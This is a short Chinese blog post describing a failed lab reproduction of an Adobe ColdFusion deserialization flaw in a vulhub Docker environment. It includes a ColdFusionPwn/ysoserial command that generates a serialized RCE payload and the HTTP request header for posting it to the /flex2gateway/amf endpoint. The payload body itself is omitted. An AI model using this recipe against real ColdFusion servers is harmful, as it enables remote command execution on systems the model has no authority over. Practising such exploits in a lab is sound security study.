Adobe ColdFusion 反序列化漏洞(一次失败的复现)
作者:互联网
Adobe ColdFusion 反序列化漏洞
0x01.环境搭建
利用vulhub搭建漏洞环境
service docker start
docker-compose up -d
查看开启的端口号
docker-compose ps
访问http://target_ip:8500/CFIDE/administrator/index.cfm
输入密码vulhub
,即可成功安装Adobe ColdFusion
0x02.漏洞复现
我们使用ColdFusionPwn工具来生成POC
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser
我执行的时候出现了这样的错误,但kali上可以生成payload
使用past from file
来给burp添加payload
文件头如下,要用Content-Type: application/x-amf
POST /flex2gateway/amf HTTP/1.1
Host: target_ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853
[...poc...]
但结果是失败的,总是无法执行命令,希望有大佬解惑
标签:Adobe,ColdFusion,Accept,amf,Content,docker,序列化 来源: https://www.cnblogs.com/-Anguvia-/p/14615796.html